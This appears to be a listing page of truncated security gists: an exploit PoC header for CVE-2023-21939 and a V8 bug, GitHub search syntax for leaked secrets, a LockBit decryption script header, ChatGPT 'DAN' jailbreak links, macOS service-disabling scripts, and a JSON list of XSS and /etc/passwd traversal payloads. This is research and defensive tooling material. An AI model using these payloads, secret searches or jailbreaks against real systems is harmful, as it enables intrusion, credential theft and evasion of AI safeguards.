EvanMcBroom

LSA Whisperer

Thank you to SpecterOps for supporting this research, to Elad for helping draft this blog, and to Sarah, Daniel, and Adam for proofreading and editing! Crossposted on the SpecterOps Blog.

What follows is the culmination of two years of research with funding by SpecterOps and contributions from many of my coworkers.

Special thanks are needed to Elad, Lee, Will, Daniel, and Kai. Elad, Lee, and Will have contributed several ideas to the project, which are documented here, and have each spent multiple days testing the tool. Daniel has answered all of my inevitable questions about AzureAD (whoops, now Ent

win3zz

CVE-2023-21939 - Code Exec - Proof of Concept

Vulnerability Summary: Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Swing). Supported versions that are affected are Oracle Java SE: 8u361, 8u361-perf, 11.0.18, 17.0.6, 20; Oracle GraalVM Enterprise Edition: 20.3.9, 21.3.5 and 22.3.1. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specifie

win3zz

GitHub Search Syntax for Finding API Keys/Secrets/Tokens

As a security professional, it is important to conduct a thorough reconnaissance. With the increasing use of APIs nowadays, it has become paramount to keep access tokens and other API-related secrets secure in order to prevent leaks. However, despite technological advances, human error remains a factor, and many developers still unknowingly hardcode their API secrets into source code and commit them to public repositories. GitHub, being a widely popular platform for public code repositories, may inadvertently host such leaked secrets. To help identify these vulnerabilities, I have created a comprehensive search list using powerful search syntax that enables the search of thousands of leaked keys and secrets in a single search.

Search Syntax:

(path:*.{File_extension1} OR path:*.{File_extension-N}) AND ({Keyname1} OR {Keyname-N}) AND (({Signature/pattern1} OR {Signature/pattern-N}) AND ({PlatformTag1} OR {PlatformTag-N}))

Examples:

**1.

5l1v3r1

'''
Author: Mohamed Ashraf (@X__Junior)

tested samples:
0be6f1e927f973df35dad6fc661048236d46879ad59f824233d757ec6e722bde
3e4bbd21756ae30c24ff7d6942656be024139f8180b7bddd4e5c62a9dfbd8c79

usage:
python3 lockbit_macos_string_decryption.py sample.bin
'''

X-Junior

'''
Author: Mohamed Ashraf (@X__Junior)

tested samples:
0be6f1e927f973df35dad6fc661048236d46879ad59f824233d757ec6e722bde
3e4bbd21756ae30c24ff7d6942656be024139f8180b7bddd4e5c62a9dfbd8c79

usage:
python3 lockbit_macos_string_decryption.py sample.bin
'''

coolaj86

Chat GPT "DAN" (and other "Jailbreaks")

• https://chat.openai.com/
• Is ChatGPT "DAN" Real? Gonna find out [Part 1]
  (https://www.youtube.com/watch?v=-q8woRG9FrI)
• Part 2: I thought ChatGPT DAN was a hoax, but...
  (https://www.youtube.com/watch?v=rHZRrDu3A2U&lc=UgxfrxX8aK7gnCzkend4AaABAg)

5l1v3r1

# Credit: pwnsdx https://gist.github.com/pwnsdx/1217727ca57de2dd2a372afdd7a0fc21; nebular https://gist.github.com/pwnsdx/d87b034c4c0210b988040ad2f85a68d3#gistcomment-3019082

# IMPORTANT: Don't forget to logout from your Apple ID in the settings before running it!
# IMPORTANT: You will need to disable SIP: Reboot to Recovery, in Terminal csrutil disable

# WARNING: It might disable things that you may not like. Please double check the services in the TODISABLE vars.

# Get active services: launchctl list | grep -v "\-\t0"
# Find a service: grep -lR [service] /System/Library/Launch* /Library/Launch* ~/Library/LaunchAgents
# List disabled services: launchctl print-disabled user/501 |grep true & launchctl print-disabled system |grep true

mistymntncop

// POC Exploit for v8 issue 1104608 (https://bugs.chromium.org/p/chromium/issues/detail?id=1104608)
// author: @mistymntncop
// bug discovered by: @r3tr0spect2019
// Exploit strategy based on @r3tr0spect2019's "Real World CTF" presentation on the bug.
// https://www.youtube.com/watch?v=rSaIlBWwxsY
//
// Build d8 using:
// a) Run once
//    git checkout 3505cf00eb4c59b87f4b5ec9fc702f7935fdffd0
//    gclient sync --with_branch_heads

b0gdanw

#!/bin/zsh
# Credit: Original idea and script disable.sh by pwnsdx https://gist.github.com/pwnsdx/d87b034c4c0210b988040ad2f85a68d3

# Disabling unwanted services on macOS Big Sur (11), macOS Monterey (12) and macOS Ventura (13)
# Disabling SIP is required  ("csrutil disable" from Terminal in Recovery)
# Modifications are written in /private/var/db/com.apple.xpc.launchd/ disabled.plist, disabled.501.plist
# To revert, delete /private/var/db/com.apple.xpc.launchd/ disabled.plist and disabled.501.plist and reboot; sudo rm -r /private/var/db/com.apple.xpc.launchd/*


# user

emadshanab

[
  "/ui/vropspluginui/rest/services/getstatus",
  "/ghost/preview",
  "/wp-admin/admin.php/%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E/?page=cnss_social_icon_page",
  "/maxsite/page/1%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
  "/cs/Satellite?pagename=OpenMarket%2FXcelerate%2FActions%2FSecurity%2FNoXceleditor&WemUI=qqq';%7D%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E",
  "/log_download.cgi?type=../../etc/passwd",
  "/templates/m/inc_head.php?q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
  "/wp-content/plugins/sagepay-server-gateway-for-woocommerce/includes/pages/redirect.php?page=%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
  "/index.php?option=com_svmap&controller=../../../../../../../etc/passwd%00",